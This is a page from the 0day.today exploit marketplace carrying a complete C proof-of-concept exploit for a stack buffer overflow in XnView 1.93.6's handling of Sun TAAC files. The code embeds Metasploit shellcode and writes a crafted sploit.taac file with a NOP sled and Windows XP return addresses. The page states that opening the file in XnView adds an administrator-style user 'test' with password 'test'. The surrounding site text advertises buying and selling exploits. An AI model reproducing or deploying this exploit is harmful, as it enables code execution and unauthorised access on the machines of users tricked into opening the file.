0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC
================================================================= XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC ================================================================= #include <stdio.h> #include <stdlib.h> /* XnView 1.93.6 for Windows .taac buffer overflow proof of concept. The vulnerability is caused due to a boundary error when processing the "format" keyword of Sun TAAC files. This can be exploited to cause a stack-based buffer overflow by e.g. tricking a user into viewing a specially crafted Sun TAAC file. Vulnerability discoverd by Secunia research http://secunia.com/secunia_research/2008-24/advisory/ Exploit code by Shinnok raydenxy@yahoo.com http://www.rstcenter.com This poc will create a "special" .taac file that when opened or viewed in XnView 1.93.6 for Windows will cause a buffer overflow and add an user "test" with password "test". Tested on Windows XP sp2&sp3. greetz to escalation666 /* /* win32_adduser - PASS=test EXITFUNC=seh USER=test Size=232 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char scode[] = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbf" "\x93\x8f\x1e\x83\xeb\xfc\xe2\xf4\x43\x7b\xcb\x1e\xbf\x93\x04\x5b" "\x83\x18\xf3\x1b\xc7\x92\x60\x95\xf0\x8b\x04\x41\x9f\x92\x64\x57" "\x34\xa7\x04\x1f\x51\xa2\x4f\x87\x13\x17\x4f\x6a\xb8\x52\x45\x13" "\xbe\x51\x64\xea\x84\xc7\xab\x1a\xca\x76\x04\x41\x9b\x92\x64\x78" "\x34\x9f\xc4\x95\xe0\x8f\x8e\xf5\x34\x8f\x04\x1f\x54\x1a\xd3\x3a" "\xbb\x50\xbe\xde\xdb\x18\xcf\x2e\x3a\x53\xf7\x12\x34\xd3\x83\x95" "\xcf\x8f\x22\x95\xd7\x9b\x64\x17\x34\x13\x3f\x1e\xbf\x93\x04\x76" "\x83\xcc\xbe\xe8\xdf\xc5\x06\xe6\x3c\x53\xf4\x4e\xd7\x63\x05\x1a" "\xe0\xfb\x17\xe0\x35\x9d\xd8\xe1\x58\xf0\xe2\x7a\x91\xf6\xf7\x7b" "\x9f\xbc\xec\x3e\xd1\xf6\xfb\x3e\xca\xe0\xea\x6c\x9f\xe7\xea\x6d" "\xcb\xb3\xfb\x7b\xcc\xe7\xaf\x31\xfe\xd7\xcb\x3e\x99\xb5\xaf\x70" "\xda\xe7\xaf\x72\xd0\xf0\xee\x72\xd8\xe1\xe0\x6b\xcf\xb3\xce\x7a" "\xd2\xfa\xe1\x77\xcc\xe7\xfd\x7f\xcb\xfc\xfd\x6d\x9f\xe7\xea\x6d" "\xcb\xb3\xa0\x5f\xfb\xd7\x8f\x1e"; unsigned char ra_sp2[] = "\xed\x1e\x94\x7c"; unsigned char ra_sp3[] = "\x83\xbf\x8a\x5b"; unsigned char nops1[257]; //256 * \x90 unsigned char nops2[21]; //20 * \x90 int main(int argc, char **argv) { int i; FILE* f; printf("[+] XnView 1.93.6 for Windows .taac buffer overflow\n"); printf("[+] Discovered by Secunia : \nhttp://secunia.com/secunia_research/2008-24/advisory/\n"); printf("[+] Coded by shinnok,greetz to escalation666.\n http://www.rstcenter.com \n"); if ((argc!=2)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))){ printf("Usage: %s target\n",argv[0]); printf("Where target is:\n"); printf("0: WinXP SP2\n"); printf("1: WinXP SP3\n"); printf("Successfull exploitation will result in the adding of user \"test\" with password \"test\".\n"); return EXIT_SUCCESS; } for(i=0;i<256;i++) nops1[i]='\x90'; nops1[256]='\0'; for(i=0;i<14;i++) nops2[i]='\x90'; nops2[20]='\0'; if(atoi(argv[1])==0) { f=fopen("sploit.taac","wb"); fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa'); fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp2,nops2,scode,'\xa'); }else{ f=fopen("sploit.taac","wb"); fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa'); fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp3,nops2,scode,'\xa'); } fclose(f); printf("sploit.taac created!\n"); printf("Now open sploit.taac in XnView or browse from it to the folder containing sploit.taac.\n"); printf("Then check with \"net user\" or from control panel for the user account test.\n"); return EXIT_SUCCESS; } # 0day.today [2024-12-24] #